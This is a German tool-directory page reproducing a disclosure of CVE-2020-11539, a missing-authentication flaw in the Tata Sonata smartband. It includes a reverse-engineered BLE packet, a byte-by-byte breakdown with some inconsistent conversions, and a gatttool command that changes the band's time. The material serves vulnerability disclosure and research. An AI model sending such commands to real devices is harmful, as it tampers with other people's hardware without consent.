Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-11539 — Unzureichende Zugriffskontrolle in der Tata Sonata Smartband | Kitploit
Tools/GitHubGitHub/the-girl-who-lived/cve-2020-11539
Bluetooth-SicherheitIoT-SicherheitSchwachstellenanalyseExploitationDrahtlose SicherheitHardware- & IoT-Sicherheit
GitHubthe-girl-who-lived/cve-2020-11539

CVE-2020-11539

Unzureichende Zugriffskontrolle in der Tata Sonata Smartband

Repository anzeigen
1133vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-11539: Unzureichende Zugriffskontrolle im Tata Sonata Smartband

Informationen

Beschreibung: Es wurde festgestellt, dass das Smartband keine Kopplung (Sicherheitsstufe 0 von BLE) aufweist. Die über die Luft übertragenen Daten sind nicht verschlüsselt. Hinzu kommt, dass die an das Smartband gesendeten Daten keine Authentifizierung oder Signaturprüfung haben, wodurch jeder Angreifer die Parameter des intelligenten Geräts steuern kann.

Betroffene Versionen: Smart SF Rush - 1.12

Forscher: Sayli Ambure (https://twitter.com/sayli_ambure)

MITRE CVE Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539

Proof-of-Concept-Exploit

Beschreibung

Das folgende Paket wurde reverse-engineered und dient zum Ändern der Uhrzeit. Weitere Pakete können durch Extrahieren des hcisnoop-Dumps von Ihrem Telefon reverse-engineered werden.

  1. Datenwert: 00870e00141401060712052b051e

    Hexdump der Daten:00870e00141401060712052b051e
    Dezimalwert der Daten:00135140020200106071805430530
  • 00 87: Header des Pakets

  • 0e 00: Typ des Pakets

  • 14 14: Jahr in Hex (2020)

  • 01 06: Monat und Tag (6. Januar)

  • 07 12: Stunde und Minute in Hex (07:18 Uhr)

  • 05 : Sekunden

  1. Senden Sie den folgenden Gatttool-Befehl, um die Uhrzeit des Smartbands zu steuern:

gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e

Proof-of-Concept-Video:

Tool herunterladen